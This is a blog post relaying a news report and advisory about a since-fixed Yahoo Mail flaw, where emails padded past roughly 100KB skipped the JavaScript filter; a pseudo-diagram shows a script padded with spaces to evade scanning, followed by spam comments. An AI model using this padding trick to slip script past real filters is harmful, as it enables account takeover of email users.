Yahoo Mail was open to hacker attacks due to a file size bug. ZDNet reports that a flaw in the Yahoo Mail system could have let attackers control victims’ Yahoo accounts
Yahoo has fixed a bug in its Yahoo Mail email system that would have allowed attackers to seize control of users’ email accounts. This bug enabled attackers to take control of a user’s account by simply sending them a specially crafted email.
The security flaw, according to eEye Digital Security’s Drew Copley:
Allowed attackers to by-pass the Web-mail system’s Javascript filters. Any message exceeding approximately 100kb in length would not be analysed by the filter, which is meant to strip messages of any potentially malicious Javascript.
“A remarkable note about this bug is that no one seems to have found it before,” Copley’s advisory reads. “As far as anyone knows.”
Technical Description:
———–EXAMPLE EMAIL———
SCRIPT
[->a bunch of chars here [spaces are most stealth], the whole file size will be just about 100KB]
[this causes the filter to not work… the code is then run automatically]
———————————
The pseudo-diagram above explains the scenario rather well. For whatever reason, Yahoo’s email filter simply does not work on files which exceed a certain range. This kind of software issue is relatively common. A remarkable note about this bug is that no one seems to have found it before.
Yahoo has fixed the Yahoo Mail bug.
Nice man. Extremely informative post. I'll be sure to pass this along to my friends.
ReplyDeleteChevrolet Cobalt Turbocharger
It is a pleasure going through your post. I have bookmarked you to check out new stuff from your side.
ReplyDeleteGet Facebook Fans
Get YouTube Likes
How To Get Twitter Followers
Hi, Nice post thanks for sharing. Would you please consider adding a link to my website on your page. Please email me back.
ReplyDeleteThanks!
Joel
JHouston791@gmail.com